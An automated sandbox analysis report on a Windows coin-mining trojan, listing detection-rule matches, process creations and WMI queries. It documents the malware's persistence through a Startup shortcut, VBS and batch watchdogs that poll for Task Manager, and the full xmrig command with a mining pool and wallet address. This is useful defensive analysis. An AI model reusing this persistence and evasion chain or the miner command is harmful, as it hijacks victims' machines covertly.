Source: 0.3.SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe.17f40c3a2bc.1.unpack, type: UNPACKEDPE	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 0.3.SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe.17f40c3a2bc.1.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0.3.SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe.17f40c3a2bc.1.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 0.3.SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe.17f40c3a2bc.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0.3.SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe.17f40c3a2bc.1.raw.unpack, type: UNPACKEDPE	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 00000000.00000003.2394891325.0000017F41238000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000F.00000000.2423381088.00007FF61B43F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000F.00000000.2422597494.00007FF61AE41000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 00000000.00000003.2394891325.0000017F40C3A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: Process Memory Space: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe PID: 6500, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: xmrig.exe PID: 6996, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware

Source: WinRing0x64.sys.0.dr

Binary string: \Device\WinRing0_1_2_0

Source: classification engine

Classification label: mal100.evad.mine.winEXE@816/7@1/1

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Code function: 0_2_00007FF71752B6F0 GetLastError,FormatMessageW,LocalFree,

0_2_00007FF71752B6F0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Code function: 0_2_00007FF717548284 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00007FF717548284

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Updater.lnk

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6952:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_03

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\watch.bat" "

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\winproc.vbs"

Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\timeout.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\timeout.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\timeout.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\timeout.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tasklist.exe, 00000034.00000003.2720864602.000002441A00D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'E;.JS;}P
Source: tasklist.exe, 00000022.00000003.2640451427.000001D14646C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'SSH\;C2
Source: tasklist.exe, 00000022.00000003.2640564619.000001D14646D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'SSH\;C
Source: tasklist.exe, 0000002A.00000003.2672280571.000002489E16E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 0000002A.00000003.2672146239.000002489E16D000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000034.00000003.2720995259.000002441A00E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'E;.JS;
Source: tasklist.exe, 0000002D.00000003.2679508132.000002275F8AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'T=.COM;.EXE;.BAT
Source: tasklist.exe, 0000002D.00000002.2683082358.000002275F8B0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 0000002D.00000003.2682279064.000002275F8AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'T=.COM;.EXE;.BAT==Y

Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	ReversingLabs: Detection: 34%
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Virustotal: Detection: 57%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\winproc.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\watch.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\1.vbs"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\process.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\Drivers\xmrig.exe xmrig.exe --donate-level 5 -o pool.supportxmr.com:443 -u 49LzTohDTP4MAvjfeeKB7pecfkp8MppQKZu5yjawPHfH2aJFbLhgV459XX9y3qoAmjJvxiewcw2bK2toFoMVEAQSLB878rm -k --tls -p speed
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\winproc.vbs"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\watch.bat" "
Source: C:\Windows\System32\tasklist.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\tasklist.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\tasklist.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
